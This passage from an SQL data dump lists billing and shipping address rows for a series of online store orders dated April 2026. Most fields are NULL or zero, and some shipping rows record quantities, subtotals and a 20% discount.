(1475, 921, '2026-04-05 22:09:06', '2026-04-05 22:09:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1476, 921, '2026-04-05 22:09:06', '2026-04-05 22:09:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 6.0000, 2532.0000, 2532.0000, 2025.6000, 2025.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -506.4000, -506.4000, 2025.6000, 2025.6000, NULL, '[]', NULL, 0.0000, 0.0000, 2532.0000, 2532.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1477, 922, '2026-04-05 22:26:03', '2026-04-05 22:26:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1478, 922, '2026-04-05 22:26:03', '2026-04-05 22:26:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1479, 923, '2026-04-06 01:10:13', '2026-04-06 01:10:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1480, 923, '2026-04-06 01:10:13', '2026-04-06 01:10:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1481, 924, '2026-04-06 02:40:33', '2026-04-06 02:40:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1482, 924, '2026-04-06 02:40:33', '2026-04-06 02:40:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1483, 925, '2026-04-06 04:23:56', '2026-04-06 04:23:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1484, 925, '2026-04-06 04:23:56', '2026-04-06 04:23:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1485, 926, '2026-04-06 10:16:35', '2026-04-06 10:16:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1486, 926, '2026-04-06 10:16:35', '2026-04-06 10:16:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1487, 927, '2026-04-06 10:39:11', '2026-04-06 10:39:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1488, 927, '2026-04-06 10:39:11', '2026-04-06 10:39:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1489, 928, '2026-04-06 10:39:18', '2026-04-06 10:39:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1490, 928, '2026-04-06 10:39:18', '2026-04-06 10:39:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1491, 929, '2026-04-06 14:09:30', '2026-04-06 14:09:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1492, 929, '2026-04-06 14:09:30', '2026-04-06 14:09:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1493, 930, '2026-04-06 17:30:59', '2026-04-06 17:30:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1494, 930, '2026-04-06 17:30:59', '2026-04-06 17:30:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1495, 931, '2026-04-06 20:10:27', '2026-04-06 20:10:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1496, 931, '2026-04-06 20:10:27', '2026-04-06 20:10:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1497, 932, '2026-04-06 20:43:45', '2026-04-06 20:43:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1498, 932, '2026-04-06 20:43:45', '2026-04-06 20:43:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1499, 933, '2026-04-07 00:12:33', '2026-04-07 00:12:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1500, 933, '2026-04-07 00:12:33', '2026-04-07 00:12:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1501, 934, '2026-04-07 05:29:09', '2026-04-07 05:29:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1502, 934, '2026-04-07 05:29:09', '2026-04-07 05:29:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1503, 935, '2026-04-07 06:43:24', '2026-04-07 06:43:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1504, 935, '2026-04-07 06:43:24', '2026-04-07 06:43:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1505, 936, '2026-04-07 11:12:04', '2026-04-07 11:12:04', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1506, 936, '2026-04-07 11:12:04', '2026-04-07 11:12:04', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1507, 937, '2026-04-07 13:33:26', '2026-04-07 13:33:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1508, 937, '2026-04-07 13:33:26', '2026-04-07 13:33:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1509, 938, '2026-04-07 14:50:31', '2026-04-07 14:50:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1510, 938, '2026-04-07 14:50:31', '2026-04-07 14:50:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1511, 939, '2026-04-07 20:19:49', '2026-04-07 20:19:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1512, 939, '2026-04-07 20:19:49', '2026-04-07 20:19:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1513, 940, '2026-04-08 00:13:16', '2026-04-08 00:13:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1514, 940, '2026-04-08 00:13:16', '2026-04-08 00:13:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1515, 941, '2026-04-08 02:58:10', '2026-04-08 02:58:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1516, 941, '2026-04-08 02:58:10', '2026-04-08 02:58:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1517, 942, '2026-04-08 08:38:38', '2026-04-08 08:38:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1518, 942, '2026-04-08 08:38:38', '2026-04-08 08:38:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1519, 943, '2026-04-08 09:25:13', '2026-04-08 09:25:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1520, 943, '2026-04-08 09:25:13', '2026-04-08 09:25:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
